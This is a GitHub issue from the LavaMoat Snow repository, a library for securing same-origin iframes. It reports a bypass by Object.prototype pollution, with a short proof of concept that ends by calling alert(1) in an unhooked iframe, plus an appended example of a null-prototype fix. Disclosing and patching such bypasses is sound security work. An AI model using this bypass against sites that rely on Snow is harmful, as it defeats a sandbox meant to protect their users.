LavaMoat / snow

Use Snow to finally secure your web app's same origin realms!
https://lavamoat.github.io/snow/demo/
MIT License

Bypass with Object.prototype pollution #112

Closed mmndaniel closed 1 year ago

mmndaniel commented 1 year ago
Object.defineProperty(Object.prototype, 'haha', {
    enumerable: true,
    value: undefined
});

var f = document.createElement('iframe');
try {
    document.head.appendChild(f);
} catch (e) {}
f.contentWindow.alert(1);

Should use the Object from natives and Object.create(null)...
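
Added example, not part of the original issue and not Snow's code: a sketch of why the suggested `Object.create(null)` fix matters, assuming a hardening routine that walks a hook table with `for...in`. The names `wrap`, `FRAGILE_HOOKS`, `SAFE_HOOKS`, `harden` and `runUnderPollution` are hypothetical, and the plain object `target` stands in for a DOM node.

```javascript
// Hypothetical hook: returns a wrapper around the original method.
const wrap = (fn) => function wrapped(...args) { return fn.apply(this, args); };

// Fragile table: an object literal inherits from Object.prototype, so
// enumerable properties added there show up during for...in.
const FRAGILE_HOOKS = { appendChild: wrap, insertBefore: wrap };

// Hardened table: null prototype, so nothing is inherited at all.
const SAFE_HOOKS = Object.create(null);
SAFE_HOOKS.appendChild = wrap;
SAFE_HOOKS.insertBefore = wrap;

// Replaces every method named in `hooks` with its wrapped version.
function harden(target, hooks) {
  const hooked = [];
  for (const name in hooks) {   // own keys first, then inherited enumerable keys
    target[name] = hooks[name](target[name]); // inherited 'haha' is undefined: TypeError
    hooked.push(name);
  }
  return hooked;
}

// Runs harden() while Object.prototype carries the property from the report.
// `configurable: true` is added here only so the demo can undo the change.
function runUnderPollution(hooks) {
  Object.defineProperty(Object.prototype, 'haha', {
    enumerable: true,
    configurable: true,
    value: undefined
  });
  try {
    const target = { appendChild() {}, insertBefore() {} }; // constructed stand-in
    return { hooked: harden(target, hooks), error: null };
  } catch (e) {
    return { hooked: [], error: e.constructor.name };
  } finally {
    delete Object.prototype.haha; // restore the global state
  }
}

console.log('literal table:       ', runUnderPollution(FRAGILE_HOOKS));
console.log('null-prototype table:', runUnderPollution(SAFE_HOOKS));
```

With the literal table the routine aborts with a `TypeError` partway through; with the null-prototype table it completes and reports both methods as hooked.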

weizman commented 1 year ago

Brilliant!